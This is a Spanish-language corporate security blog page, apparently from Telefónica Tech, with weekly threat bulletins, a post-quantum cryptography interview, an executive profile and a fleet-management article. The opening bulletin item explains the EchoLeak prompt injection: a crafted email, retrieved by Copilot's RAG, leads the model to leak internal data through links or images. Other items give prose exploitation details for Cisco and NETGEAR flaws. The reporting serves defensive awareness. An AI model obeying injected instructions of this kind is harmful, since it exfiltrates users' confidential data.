Boletín Semanal de Ciberseguridad, 7-13 junio
Descubierta EchoLeak, una vulnerabilidad 0-clic en Microsoft 365 Copilot Investigadores de Aim Labs han descubierto una nueva vulnerabilidad crítica, denominada EchoLeak (CVE-2025-32711, CVSSv3 9.3 según Microsoft), que afecta a Microsoft 365 Copilot. Esta falla, corregida por Microsoft en mayo de 2025, permitía a un atacante exfiltrar datos sensibles sin interacción del usuario. La técnica consiste en enviar un correo con una inyección de prompt oculta, diseñada para parecer un mensaje corporativo. Posteriormente, cuando el usuario realiza una consulta relacionada en Copilot, el correo es recuperado y procesado por el motor de RAG, activando la orden maliciosa. Esta induce al modelo a insertar datos internos en enlaces o imágenes que, al cargarse, filtran la información a un servidor externo. Aunque no hay indicios de explotación real, EchoLeak marca la aparición de una nueva clase de fallos, conocidos como LLM Scope Violation, que exponen los riesgos de la integración profunda de IA en entornos empresariales. Más info Microsoft corrige un 0‑day crítico y 65 vulnerabilidades adicionales en el Patch Tuesday de junio Microsoft ha publicado su boletín de seguridad de junio de 2025, que corrige 66 fallos, incluido un 0-day activamente explotado en WebDAV (CVE-2025-33053 CVSSv3 8.8) que permite la ejecución remota de código engañando al usuario con una URL maliciosa. También resuelve otra vulnerabilidad divulgada públicamente en el cliente SMB (CVE-2025-33073 CVSSv3 8.8) que permite la elevación de privilegios a SYSTEM sin interacción del usuario. Del número total de fallos, diez se consideran críticos (ocho RCE, dos de elevación de privilegios), mientras que el resto incluye fallos de revelación de información, denegación de servicio, omisión de seguridad y suplantación de identidad. Además, se corrigieron múltiples vulnerabilidades en Office (Word, Excel, Outlook, PowerPoint, SharePoint) con puntuaciones CVSS entre 8,4 y 8,8. Microsoft también publicó compilaciones para Windows 10 y 11 con correcciones adicionales, mejoras funcionales y restauraciones del sistema. Aunque no se ha informado de exploits masivos, la presencia de un 0-day activo hace que sea urgente aplicar estas actualizaciones. Más info Myth Stealer: un infostealer en Rust que evoluciona rápidamente Investigadores de Trellix identificaron Myth Stealer, un infostealer escrito en Rust distribuido mediante sitios fraudulentos de videojuegos. Este malware muestra una ventana falsa para simular legitimidad mientras extrae credenciales, cookies y datos del portapapeles, además de utilizar técnicas de evasión como ofuscación con obfstr, persistencia en el sistema, captura de pantalla, verificación de entornos sandbox y ejecución en memoria con memexec y sustraer información de navegadores basados en Chromium y Gecko, así como aplicaciones como Discord. Se distribuye en archivos .exe, .rar y .zip, generalmente bajo el pretexto de ser juegos o software vinculado a ellos. Sus operadores lo ofrecen por suscripción semanal o mensual a través de Telegram y presenta un alto grado de actualización para dificultar su detección. Más info ConnectWise reemplaza los certificados de ScreenConnect, ConnectWise Automate y RMM ConnectWise ha decidido reemplazar los certificados digitales de firma de código utilizados para firmar sus herramientas ScreenConnect, ConnectWise Automate y RMM, tras una advertencia de un investigador externo sobre un posible mal uso relacionado con el manejo de datos de configuración por parte del instalador, que podría ser explotado por un atacante con acceso a nivel de sistema. Más info APT PurpleHaze y ShadowPad apuntan a proveedores de ciberseguridad y entidades globales SentinelOne revela que, entre julio de 2024 y marzo de 2025, grupos chinos con nexos estatales, incluidos los operadores PurpleHaze y ShadowPad, han lanzado campañas de ciberespionaje contra más de 70 organizaciones, que abarcan los sectores gubernamental, financiero, tecnológico, de investigación y medios de comunicación, incluidos proveedores de seguridad como la propia SentinelOne. Un objetivo destacado era una empresa de logística de hardware que apoyaba a SentinelOne, mientras que también detectaron actividades de reconocimiento dirigidas a servidores accesibles a través de Internet. Estas intrusiones empleaban backdoors como GOREshell y ShadowPad, con una sofisticación técnica relevante como el uso de redes ORB y malware de ofuscación ScatterBrain. En algunos casos, se aprovecharon vulnerabilidades como CVE-2024-8963 y CVE-2024-8190 en dispositivos Ivanti para el acceso inicial. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
13 de junio de 2025
Boletín Semanal de Ciberseguridad, 6 junio
Análisis de Scattered Spider Scattered Spider se ha dirigido a los sectores de hostelería, telecomunicaciones, finanzas y al comercio minorista con una elevada sofisticación. El grupo, activo desde al menos 2022, se diferencia por su combinación de ingeniería social avanzada y conocimientos técnicos. Su modus operandi se basa en la manipulación de empleados de soporte de TI y eludir la autenticación MFA a través del vishing o tácticas similares, haciéndose pasar por personal legítimo y mostrando dominio del inglés. En adición, Scattered Spider sería socio del RaaS DragonForce, centrándose en la obtención de acceso inicial mientras externaliza el cifrado y la negociación de rescates a DragonForce. Tras acceder, recopilan credenciales mediante herramientas como Mimikatz y Cobalt Strike, escalan privilegios a través de infraestructuras como Active Directory u Okta, y exfiltran datos confidenciales antes de desplegar el ransomware. Scattered Spider, además, se centraría en servicios SSO y herramientas de acceso remoto como VPN y pasarelas RDP para el movimiento lateral. Su uso de técnicas living-off-the-land, junto con la desactivación de controles de seguridad y la eliminación de registros, dificulta aún más el análisis y la respuesta a incidentes. Más info UNC6040 compromete instancias de Salesforce para extorsión de datos El Grupo de Inteligencia de Amenazas de Google (GTIG) ha identificado una campaña de ciberataques llevada a cabo por el grupo UNC6040, que utiliza técnicas de vishing (phishing por voz) para comprometer instancias de Salesforce en organizaciones multinacionales. Los atacantes se hacen pasar por personal de soporte técnico y, mediante llamadas telefónicas, persuaden a los empleados para que autoricen una aplicación conectada maliciosa en el portal de Salesforce de la empresa. Esta aplicación, una versión modificada del Data Loader de Salesforce, no está autorizada por la plataforma y permite a los atacantes acceder, consultar y exfiltrar información sensible directamente desde el entorno comprometido de Salesforce. En algunos casos, las actividades de extorsión no se han manifestado hasta varios meses después de la intrusión inicial, lo que sugiere que UNC6040 podría estar colaborando con otros actores de amenazas para monetizar el acceso a los datos robados. Durante estos intentos de extorsión, los atacantes han afirmado estar afiliados al grupo de hackers ShinyHunters. Más info Crocodilus emplea nuevas técnicas de ingeniería social Investigadores de Threat Fabric han detectado una nueva versión del malware para Android Crocodilus, que ahora incluye una función para añadir contactos falsos al dispositivo infectado. Esta técnica permite que las llamadas de los atacantes muestren nombres confiables como “Soporte del Banco”, suplantando así a entidades legítimas. Esta característica se activa mediante un comando remoto y se ejecuta mediante la API de ContentProvider. Además, el malware ha evolucionado con mejoras centradas en la evasión, como el empaquetado del código del dropper, cifrado XOR adicional y técnicas de ofuscación que dificultan el análisis. También se ha añadido procesamiento local de datos robados para optimizar la calidad de la información exfiltrada. Los investigadores han recomendado descargar aplicaciones solo de fuentes confiables y mantener activo Google Play Protect. Más info Aumenta la presencia de DCRat en América Latina mediante campañas de phishing dirigidas En mayo de 2025, IBM X-Force detectó una serie de campañas de phishing en Colombia, atribuidas al grupo cibercriminal Hive0131, que suplantaban a la Rama Judicial de Colombia para distribuir el troyano de acceso remoto DCRat. Estas campañas empleaban correos electrónicos con enlaces a archivos ZIP que, al ser abiertos, ejecutaban scripts maliciosos diseñados para instalar DCRat en la memoria del sistema, evitando así su detección por soluciones antivirus tradicionales. DCRat, operado como Malware-as-a-Service (MaaS) desde al menos 2018, es conocido por su bajo costo y amplia disponibilidad en foros cibercriminales rusos. Sus capacidades incluyen grabación de audio y video, captura de pulsaciones de teclado, manipulación del sistema de archivos y persistencia mediante tareas programadas o claves de registro. Más info Publicados detalles técnicos de explotación del fallo CVE-2025-20188 Investigadores de Horizon3 han publicado detalles técnicos de un fallo de carga arbitraria de archivos de Cisco IOS XE WLC, rastreado como CVE-2025-20188 (CVSSv3 10.0 según Cisco). La vulnerabilidad es causada por un código JSON Web Token (JWT) que permite a un atacante remoto no autenticado cargar archivos, realizar path traversal y ejecutar comandos arbitrarios con privilegios de root cuando la función Out-of-Band AP Image Download está activada. El análisis de Horizon3 muestra que el fallo existe debido a un secreto JWT fallback codificado como notfound y utilizado por los scripts OpenResty (Lua + Nginx) del backend para los puntos finales de carga, combinado con una validación de ruta insuficiente. En concreto, el backend utiliza los scripts para validar los tokens JWT y gestionar las subidas de archivos, pero si falta el archivo '/tmp/nginx_jwt_key', el script recurre a la cadena notfound para verificar los JWT. Esto permite a los atacantes generar tokens válidos. Se recomienda a los usuarios actualizar a la versión parcheada 17.12.04, o posterior, lo antes posible. Como solución temporal, es posible desactivar la función Out-of-Band AP Image Download para cerrar el servicio vulnerable. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
6 de junio de 2025
Boletín Semanal de Ciberseguridad, 24-30 mayo
Vulnerabilidad crítica en WSO2 permite secuestro de cuentas a través de servicios SOAP Una vulnerabilidad crítica identificada como CVE-2024-6914 (CVSSv3 9.8) afecta a múltiples productos de WSO2, permitiendo a actores maliciosos tomar el control de cuentas de usuario, incluidas aquellas con privilegios elevados. El fallo se origina en un error de autorización en el servicio de administración SOAP relacionado con la recuperación de cuentas, accesible mediante la ruta "/services". Explotando esta vulnerabilidad, un atacante puede restablecer contraseñas de cualquier cuenta sin necesidad de autenticación previa, lo que representa un riesgo significativo para la seguridad de las organizaciones que utilizan estos productos. Se recomienda a las organizaciones que implementen las correcciones proporcionadas por WSO2 y restrinjan el acceso a los servicios SOAP administrativos desde redes no confiables, siguiendo las directrices de seguridad para despliegues en producción. Más info Análisis del malware DOUBLELOADER Elastic Security Labs ha identificado una nueva familia de malware denominada DOUBLELOADER, empleada junto al infostealer Rhadamantys y protegida mediante ALCATRAZ, un ofuscador open-source que está siendo empleado ampliamente por actores maliciosos. Originalmente desarrollado en la comunidad de game hacking, ALCATRAZ aplica técnicas avanzadas como control flow flattening, mutación de instrucciones y anti-disassembly, dificultando el análisis del malware. Asimismo, DOUBLELOADER destaca por inyectar código malicioso en explorer.exe mediante llamadas al sistema y mantener comunicación con un servidor C2. Además, su sección “.0Dev” lo vincula directamente con ALCATRAZ. Los investigadores han desarrollado scripts en IDA Python, reglas YARA y plugins especializados para ayudar a los analistas a identificar estas amenazas. Más info DragonForce compromete MSPs mediante fallos en SimpleHelp El grupo de ransomware DragonForce ha explotado vulnerabilidades en SimpleHelp, una herramienta de gestión remota utilizada por proveedores de servicios gestionados (MSPs), para comprometer múltiples redes de clientes. De acuerdo con un informe publicado por Sophos, el grupo empleó los fallos de seguridad CVE-2024-57726 (CVSSv3 9.8), CVE-2024-57727 (CVSSv3 7.5) y CVE-2024-57728 (CVSSv3 7.2) para acceder a sistemas, realizar tareas de reconocimiento, robar datos y desplegar ransomware. DragonForce ha ganado notoriedad recientemente por ataques a minoristas del Reino Unido como Marks & Spencer y Co-op. Asimismo, los investigadores destacan que la estrategia de DragonForce se caracterizaría por buscar ampliar su influencia mediante un modelo de Ransomware-as-a-Service con cifradores de marca blanca, que pueden ser personalizados por los afiliados. Más info Corregido un fallo crítico de puerta trasera en routers DGND3700v2 de NETGEAR Se ha observado una vulnerabilidad de elusión de autenticación en los routers inalámbricos DGND3700v2 de NETGEAR, para el que también se ha publicado una PoC del exploit. El fallo (CVE-2025-4978, CVSSv4 9.3 según VulnDB) se origina en un mecanismo de puerta trasera oculto en el firmware del router y afecta a las versiones V1.1.00.15_1.00.15NA. Un atacante no autenticado podría obtener un control administrativo total sobre los dispositivos afectados, incluyendo el robo de credenciales, el despliegue de malware y la interceptación del tráfico. La falla reside en el servidor mini_http del router, un daemon HTTP ligero responsable de gestionar las peticiones de la interfaz administrativa. El fallo puede desencadenarse accediendo al endpoint vulnerable /BRS_top.html, que establece un indicador interno “start_in_blankstate = 1”. Este desactiva las comprobaciones de autenticación básica HTTP en la función sub_404930, eludiendo las credenciales de inicio de sesión. NETGEAR ha parcheado el firmware en la versión V1.1.00.26, recomendando su actualización inmediata. Más info Void Blizzard: nuevo grupo ruso apunta a sectores críticos en Europa y América del Norte Microsoft ha identificado un nuevo actor de ciberespionaje llamado Void Blizzard (también conocido como LAUNDRY BEAR), vinculado al gobierno ruso. Activo desde al menos abril de 2024, ha dirigido ataques a entidades gubernamentales, defensa, transporte, medios, ONG y sanidad en Europa y América del Norte. Inicialmente centrado en el uso de credenciales comprometidas obtenidas en mercados clandestinos, el grupo ha evolucionado hacia técnicas de spear phishing personalizadas para comprometer cuentas corporativas. Una vez logrado el acceso, Void Blizzard exfiltra correos electrónicos y documentos confidenciales a través de herramientas como rclone y utiliza servidores de comando y control alojados en servicios legítimos para evadir detección. La campaña destaca por su adaptación a cada víctima y por el uso de infraestructura personalizada y correos específicos redactados con información verosímil para aumentar su tasa de éxito. Microsoft trabaja en colaboración con servicios de inteligencia de Países Bajos y el FBI para desarticular estas operaciones y proteger a las organizaciones afectadas. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
30 de mayo de 2025
"Debemos empezar ya a prepararnos para una transición poscuántica." —José Luis Domínguez
La criptografía es esencial para la seguridad y soberanía digital. Sin embargo, con la computación cuántica, los sistemas criptográficos asimétricos actuales serán vulnerables. Esto exige una transición hacia la criptografía poscuántica. ______ ¿Por qué es importante considerar la Ciberseguridad cuántica en la actualidad y cuáles son los principales riesgos asociados? La Ciberseguridad cuántica es importante debido a los avances en las tecnologías de computación cuántica. Estas tecnologías tienen el potencial de superar los mecanismos de cifrado utilizados actualmente en el ámbito de la seguridad digital. Este avance modificará las reglas vigentes, por lo que es imprescindible tener hoy esta capacidad de protección, antes de que los ordenadores cuánticos criptográficamente relevantes cambien las reglas de cifrado establecidas. En agosto del año pasado, el NIST publicó los primeros algoritmos de criptografía poscuántica, iniciando la protección contra la computación cuántica. Estos algoritmos, elegidos por la comunidad criptográfica global, nos permiten comenzar la transición poscuántica. ¿Qué estrategias deben adoptar las empresas para prepararse contra las amenazas cuánticas? Las empresas deben comenzar a tener una visibilidad clara de los algoritmos de cifrado que utilizan, así como identificar la ubicación y los activos con mayor riesgo de ser atacados. El propósito de esta medida es implementar una estrategia de transformación de todos sus algoritmos hacia la criptografía poscuántica. Criptoagilidad consiste en implementar soluciones de seguridad capaces de cambiar dinámicamente los algoritmos de cifrado. ¿En qué consisten nuestras soluciones y servicios de Ciberseguridad Quantum Safe? En Telefónica Tech ofrecemos una amplia gama de soluciones de Ciberseguridad Quantum Safe que incluyen consultoría y servicios profesionales basados en auditorías para identificar activos críticos. También proveemos servicios de identificación de activos de los clientes, protección de estos activos mediante estrategias de remediación y, finalmente, el gobierno y supervisión de activos a lo largo del tiempo para asegurar una transición exitosa y mantener la seguridad a largo plazo. Nuestras soluciones de Ciberseguridad Quantum Safe están diseñadas para proteger contra las amenazas de la computación cuántica y garantizar la resiliencia de las infraestructuras digitales. Utilizamos algoritmos de criptografía poscuántica para asegurar la integridad y confidencialidad de los datos, desde la actualización de infraestructuras de clave pública hasta la implementación de soluciones de descubrimiento automatizado, permitiendo así una gestión eficaz de la seguridad en un entorno poscuántico. ¿Qué recomendaciones están surgiendo en torno a la Ciberseguridad cuántica y que medidas deben tomar las empresas para cumplir con ellas? Las principales recomendaciones en este ámbito provienen de organismos como NIST en EE. UU. o CCN (Centro Criptológico Nacional) en España. Estas recomendaciones se centran en la transición hacia un enfoque cuántico y una adaptación progresiva. Se reconoce que será un entorno híbrido donde los clientes utilizarán cifrado tradicional junto con cifrado poscuántico durante el proceso de transición. Actualmente se está exfiltrando información que podrá descifrarse con computadoras cuánticas. Esta ciberamenaza, conocida como HNDL (Harvest Now, Decrypt Later), requiere contar ya con esta capacidad de protección. Además, se introduce el concepto de criptoagilidad, que consiste en implementar soluciones capaces de cambiar dinámicamente los algoritmos si alguno de ellos queda comprometido. Tanto la transición y adaptación como el concepto de criptoagilidad son las recomendaciones actuales para nuestros clientes. * * * Descarga nuestra guía para proteger tus datos frente a la amenaza cuántica Desde Telefónica Tech proponemos un enfoque estratégico basado en la criptoagilidad, que permite adaptar los sistemas ante nuevas amenazas sin comprometer la operativa actual. ■ Invitamos a todas las organizaciones a descargar nuestra guía de Preparación estratégica para la Criptografía Poscuántica e iniciar cuanto antes su transición hacia una infraestructura criptográfica resiliente y preparada para la era cuántica.
26 de mayo de 2025
Boletín Semanal de Ciberseguridad, 17-23 mayo
VMware emite parches de seguridad urgentes para solucionar nuevos fallos VMware publicó parches de seguridad para corregir dos conjuntos de fallos que exponen su software a fugas de datos, ejecución de comandos y ataques de denegación de servicio (DoS), sin soluciones temporales disponibles. El aviso más urgente, VMSA-2025-0009, da crédito a la OTAN por alertar de tres fallos en VMware Cloud Foundation. La falla CVE-2025-41229 (CVSSv3 8.2) es un problema de acceso a directorios por el que un atacante con acceso de red al puerto 443 podría acceder a determinados servicios internos. Se incluyen un fallo de divulgación de información registrado como CVE-2025-41230 (CVSSv3 7.5) y un error de falta de autorización identificado como CVE-2025-41231 (CVSSv3 7.3). Se insta a los clientes a actualizar a la versión 5.2.1.2 de VMware Cloud Foundation. También se publicó el boletín VMSA-2025-0010 documentando cuatro fallas en ESXi, vCenter Server, Workstation y Fusion, destacando CVE-2025-41225 (CVVSv3 8.8), un fallo de ejecución de comandos autenticados en vCenter. Más info Hazy Hawk secuestra subdominios de gobiernos y empresas mediante CNAME abandonados Hazy Hawk ha sido detectado explotando registros DNS CNAME olvidados que apuntan a servicios en la nube abandonados. Según Infoblox, los atacantes localizan subdominios con este tipo de configuración, registran los recursos en la nube asociados y así consiguen que los subdominios apunten a su infraestructura maliciosa. Entre las entidades afectadas se encuentran organizaciones de alto perfil como CDC, UNICEF, NYU, el gobierno de California, y empresas como Honeywell, Deloitte y Unilever. Una vez comprometidos, los subdominios se utilizan para alojar aplicaciones falsas, campañas de phishing o redirigir a los usuarios a páginas de estafa. Estas URL se posicionan favorablemente en buscadores gracias a la alta reputación del dominio original, facilitando la difusión del contenido malicioso. Los atacantes además emplean técnicas de filtrado como TDS para perfilar a los visitantes según su ubicación, dispositivo y uso de VPN. Más info Ataque a la cadena de suministro: RVTools distribuye malware Bumblebee ZeroDay Labs detectó que el instalador de RVTools había sido comprometido para distribuir el malware Bumblebee. El archivo malicioso incluía una DLL que se ejecutaba desde el mismo directorio que el instalador, un comportamiento que fue identificado por Microsoft Defender como sospechoso. El malware Bumblebee es conocido por facilitar el acceso inicial a sistemas comprometidos, permitiendo la ejecución de cargas útiles adicionales y facilitando ataques de ransomware. Tras la detección, el sitio web de RVTools fue temporalmente desconectado y posteriormente restaurado con una versión limpia del instalador. Se recomienda verificar la integridad del instalador comprobando hashes y que no se haya ejecutado el archivo version.dll desde directorios de usuario. Más info Corregido un fallo en el SDK Auth0-PHP que permitiría el secuestro de sesiones Se detectó un fallo que afecta a las versiones 8.0.0-BETA1 y posteriores del SDK Auth0-PHP cuando se configura con CookieStore para el almacenamiento de sesiones. La falla se centra en la implementación criptográfica utilizada para asegurar las cookies de sesión. Cuando se usa CookieStore para gestionar las sesiones, las etiquetas de autenticación generadas para las cookies pueden ser sistemáticamente forzadas mediante fuerza bruta, permitiendo falsificar credenciales de autenticación válidas, eludiendo los mecanismos de autenticación previstos y obteniendo acceso no autorizado a recursos protegidos y cuentas de usuario sin credenciales legítimas. Tras comprometer las cookies de sesión, los atacantes pueden hacerse pasar por usuarios legítimos y realizar acciones con sus privilegios. Se parcheó en la versión 8.14.0, y Okta, empresa matriz de Auth0, recomienda actualizar lo antes posible y adoptar medidas de seguridad adicionales. Más info Europol y Microsoft desmantelan Lumma, el mayor infostealer del mundo Europol y Microsoft han desmantelado Lumma Stealer, un malware de robo de información que infectó más de 394 000 equipos Windows entre marzo y mayo de 2025. Desarrollado en Rusia, Lumma robaba credenciales, datos bancarios y criptomonedas, y era ampliamente utilizado por grupos como Scattered Spider. La operación conjunta permitió desactivar más de 2 300 dominios maliciosos y tomar el control de su infraestructura de comando y control. El Departamento de Justicia de EE. UU. y la Cybercrime Control Center de Japón también participaron en el operativo. Lumma se distribuía mediante campañas de phishing y plataformas como Telegram, destacando por su facilidad de uso y capacidad para evadir defensas. Aunque su infraestructura ha sido desmantelada, expertos advierten que los infostealers siguen siendo una amenaza persistente en el panorama actual. Más info ◾ Este boletín es uno de los entregables de nuestro servicio Operational and Strategic Intelligence. Si deseas conocer el resto de los contenidos de inteligencia operativa y estratégica incluidos en el servicio contacta con nosotros →
23 de mayo de 2025
Mariel Domínguez: Transformación digital con soluciones de Microsoft
Mariel Domínguez, directora de Microsoft Business Unit en Telefónica Tech, comparte su trayectoria en el sector tecnológico. Hablamos con ella de la importancia de las soluciones Microsoft para la transformación digital y la competitividad empresarial, así como de los retos y estrategias en su posición actual. ______ Cuéntanos un poco sobre ti: ¿quién eres y cuál ha sido tu camino hasta llegar a liderar nuestra unidad de negocio de soluciones Microsoft? Soy madre de dos hijos, amante del deporte y una apasionada de la tecnología desde el inicio de mi carrera profesional. Fue cuando comencé a trabajar en campañas de ventas para Microsoft cuando descubrí el dinamismo y el atractivo de este sector. Un tiempo después empecé a trabajar como account manager también para Microsoft, ayudando a los clientes a transformar sus negocios y agilizar los procesos. En mi posición actual en Telefónica Tech, lidero la Microsoft Business Unit con el objetivo de asegurar que nuestras soluciones permitan a las empresas aumentar su competitividad y capacidad de innovación. Nuestro enfoque se centra en la ejecución de proyectos que maximizan el uso de las herramientas de Microsoft, desde la adopción de servicios en la nube hasta la implementación de tecnologías de inteligencia artificial con 365 Copilot. El dinamismo del sector tecnológico me atrapó desde el primer momento. He tenido la oportunidad de liderar equipos y transformar negocios, siempre buscando aumentar la competitividad y la innovación en las empresas. ¿Siempre tuviste claro que querías dedicarte al mundo de la tecnología? ¿Qué fue lo que más te atrajo de este sector? Lo descubrí por casualidad. Después de terminar mi carrera de Ciencias Políticas y Sociología comencé a estudiar la oposición al Ministerio de Fomento. Ahí fue cuando, para cubrir los gastos, empecé a trabajar para Microsoft a través de una empresa externa, realizando campañas puntuales de venta. El ritmo del negocio y el producto me resultaron interesantes, lo que me llevó a liderar un equipo dedicado a venta interna. ¿Cuáles son tus principales retos y objetivos al frente de la Microsoft Business Unit en Telefónica Tech? Mis principales retos y objetivos al frente de la Microsoft Business Unit en Telefónica Tech incluyen impulsar la innovación, fomentar el desarrollo de nuevas soluciones tecnológicas y mantener nuestro crecimiento mediante estrategias de comercialización y alianzas estratégicas. Además, estamos implementando estrategias para optimizar la experiencia del cliente, asegurando que nuestros productos y servicios sean accesibles, eficientes y estén alineados con las demandas del mercado. Con un enfoque en la excelencia operativa y la colaboración, estamos comprometidos a ofrecer soluciones que impulsen la transformación digital y el éxito continuo de nuestros clientes. ¿Cómo están ayudando nuestras soluciones a que las empresas sean más competitivas y eficientes? Nuestras soluciones ayudan a las empresas a mejorar su competitividad y eficiencia mediante el uso de herramientas integradas que facilitan la colaboración, automatizan procesos y proporcionan análisis avanzados. Las tecnologías digitales de nueva generación permiten a las empresas reducir costes, incrementar la productividad y ser más sostenibles, también financieramente. Estas soluciones integradas permiten a las empresas ser más ágiles e innovadoras para adaptarse rápidamente a los necesidades y demandas de los clientes. ¿Qué tendencias tecnológicas consideras clave para el futuro inmediato de las empresas? Las tendencias tecnológicas están transformando el mundo empresarial. Esto es especialmente relevante para nuestra Microsoft Business Unit de Telefónica Tech, que nos permite ofrecer soluciones integradas que dan a las empresas nuevas oportunidades para que mejoren sus operaciones y se mantengan competitivas. Nuestras soluciones abarcan tecnologías avanzadas que facilitan la creación y utilización de contenido, proporcionan flexibilidad y colaboración a través de la nube, conectan dispositivos y sistemas mediante IoT, y aseguran la protección de la información con ciberseguridad. Estas tendencias ofrecen a las empresas nuevas oportunidades para mejorar la eficiencia operativa y la competitividad empresarial. ¿Qué significa para ti la iniciativa #WomenWithTech? La iniciativa #WomenWithTech de Telefónica es una plataforma increíblemente inspiradora que busca impulsar la visibilidad y el liderazgo de las mujeres en el sector tecnológico. Para mí, significa continuar con un compromiso firme con la diversidad y la equidad, que siempre he llevado a cabo a lo largo de mi carrera profesional. Promover referentes femeninos puede motivar a las nuevas generaciones a seguir carreras en STEAM. #WomenWithTech crea un espacio donde se pueden compartir experiencias, aprender y crecer juntas. También es una oportunidad para romper estereotipos y demostrar que el talento y la pasión por la tecnología no tienen género. Estoy muy orgullosa de que Telefónica Tech fomente este movimiento que fortalece la comunidad tecnológica y crea un entorno más inclusivo y diverso. Desde tu experiencia, ¿cómo contribuye la diversidad de género a la innovación tecnológica y qué papel desempeñan las mujeres en las profesiones STEAM? La diversidad en tecnología aporta perspectivas únicas, enriqueciendo el proceso creativo y la resolución de problemas. Las mujeres en STEAM proporcionamos enfoques diversos, creando soluciones inclusivas y promoviendo un entorno colaborativo. Además, inspiramos a futuras generaciones, fomentando la equidad y diversidad en la industria tecnológica. ¿Qué mensaje le darías a una joven que hoy está pensando en estudiar una carrera tecnológica? ¿Qué habilidades crees que son esenciales para tener éxito en este sector? Sobre todo, le diría: ¡sigue tu pasión y no te detengas! Las carreras tecnológicas están llenas de oportunidades para innovar e incluso cambiar el mundo. Es fundamental desarrollar ciertas habilidades para tener éxito en este sector; como la curiosidad, que te motiva a aprender y explorar nuevas ideas; la capacidad de resolución de problemas, para abordar los desafíos; y el trabajo en equipo, para colaborar y comunicar eficazmente con otros. Ser adaptable y flexible ante nuevas tecnologías y usar la creatividad para innovar y pensar fuera de lo convencional es clave en el sector tecnológico. También es esencial adquirir conocimientos técnicos sólidos en programación, matemáticas y ciencias. Además, le animaría a buscar mentores y redes de apoyo, y a no dejarse intimidar por los desafíos. La tecnología necesita más voces diversas, y su contribución puede ser increíblemente valiosa. Con estas habilidades y una mentalidad abierta, cualquier joven puede sobresalir y dejar una huella significativa en el mundo de la tecnología.
12 de mayo de 2025
Tecnologías clave para la gestión eficiente de flotas
La eficiencia operativa es fundamental en gestión de flotas, las tecnologías avanzadas se convierten en aliados indispensables. La digitalización del sector ha permitido mejorar la visibilidad, el control y la optimización del uso de los vehículos, ofreciendo soluciones innovadoras para hacer frente a los retos actuales. Desde el acceso sin llave hasta la conectividad OEM, el mantenimiento predictivo y el análisis avanzado de datos, estas herramientas ayudan a las empresas a mejorar su rentabilidad y sostenibilidad. Empresas de todo el mundo están adoptando soluciones telemáticas para optimizar sus flotas y mejorar la toma de decisiones basada en datos. Nuestro partner Geotab, como proveedor de tecnología para la gestión de flotas, participa de la integración de estos avances en distintos sectores, permitiendo un acceso más eficiente a la información en tiempo real. Estas tecnologías permiten optimizar la operativa diaria y contribuyen a la seguridad vial, la reducción de emisiones y el cumplimiento normativo incorporando accesorios. Además, incluyen paneles de control detallados con alertas personalizables para respaldar decisiones informadas y anticipar problemas operativos. Estas soluciones ayudan a las empresas a reducir el consumo de combustible y las emisiones de CO2, lo que contribuye a una operación más sostenible. Acceso sin llave: flexibilidad en la movilidad compartida La tecnología de acceso sin llave (keyless) incorporada en nuestra solución de gestión de flotas permite a los conductores utilizar vehículos sin necesidad de llaves físicas, por lo que es una solución práctica para flotas comerciales, carsharing y otros servicios de movilidad. Esta tecnología es clave para mejorar la experiencia del usuario y optimizar el uso de los vehículos en usos de movilidad compartida. Principales aplicaciones Simplificación operativa: reduce la dependencia de llaves físicas, permitiendo una gestión más eficiente. Versatilidad: puede aplicarse a vehículos de distintas marcas y modelos, facilitando la gestión de flotas mixtas. Optimización de recursos: aumenta la disponibilidad de vehículos al eliminar retrasos relacionados con la gestión de llaves. Mayor seguridad: reduce el riesgo de pérdida o robo de llaves, mejorando el control de accesos. Gracias al enfoque basado en datos, los gestores de flotas pueden monitorizar en tiempo real el uso de los vehículos, mejorar la seguridad y reducir costes operativos. Conectividad OEM: datos precisos directamente del vehículo La integración con los fabricantes de vehículos (OEM) proporciona una forma eficiente de recopilar datos directamente desde el hardware original del vehículo. Esta tecnología permite acceder a información detallada sin necesidad de dispositivos adicionales, facilitando aún más la captación de datos para el análisis del rendimiento y mantenimiento de los vehículos. Beneficios para la gestión de flotas Reducción de complejidad: evita la instalación de dispositivos externos, simplificando la implementación. Calidad de los datos: proporciona información fiable sobre rendimiento, mantenimiento y consumo de combustible. Compatibilidad: es ideal para flotas que operan con vehículos de distintos fabricantes, facilitando una visión unificada de la flota. Cumplimiento normativo: permite un seguimiento más preciso de las normativas de emisiones y seguridad. Además, la disponibilidad en tiempo real sobre el estado del vehículo permite a los gestores de flotas identificar patrones de conducción, anticipar fallos mecánicos y mejorar el mantenimiento preventivo, reduciendo los tiempos de inactividad. La incorporación de soluciones de Geotab en nuestra solución de gestión de flotas ofrece a las empresas la capacidad de transformar datos en decisiones estratégicas. Análisis de datos: de la información a la acción Las herramientas avanzadas de análisis, como los conectores de datos, permiten integrar la información de las flotas en plataformas de inteligencia empresarial. Esto ayuda a las empresas a tomar decisiones fundamentadas y a identificar áreas de mejora, transformando grandes volúmenes de datos en estrategias operativas efectivas. Usos principales Conexión con sistemas existentes: facilita la integración con herramientas como Power BI o Tableau para la visualización de datos. Identificación de tendencias: permite generar informes que muestran patrones clave de uso, consumo y mantenimiento. Escalabilidad: es adecuada para empresas de cualquier tamaño, desde pequeñas flotas hasta grandes operaciones con miles de vehículos. Sostenibilidad: facilita la reducción de la huella de carbono al optimizar rutas y mejorar la eficiencia en el consumo de combustible. Seguridad: identifica hábitos de conducción susceptibles de ser corregidos o mejorado para incrementar la seguridad vial. ■ Nuestra solución de gestión de flotas con tecnologías de Geotab permite a las empresas convertir datos en decisiones estratégicas. Esta solución, adecuada para cualquier tipo de flota, optimiza la operatividad, promueve la sostenibilidad y mejora la seguridad vial, facilitando una movilidad conectada y eficiente. Geotab es parte de nuestro ecosistema de partners. IA & Data AI of Things (XII): soluciones OEM para el coche conectado 15 de noviembre de 2022
5 de mayo de 2025
Seguridad en API: el riesgo del escalado de privilegios y la necesidad de una defensa integral
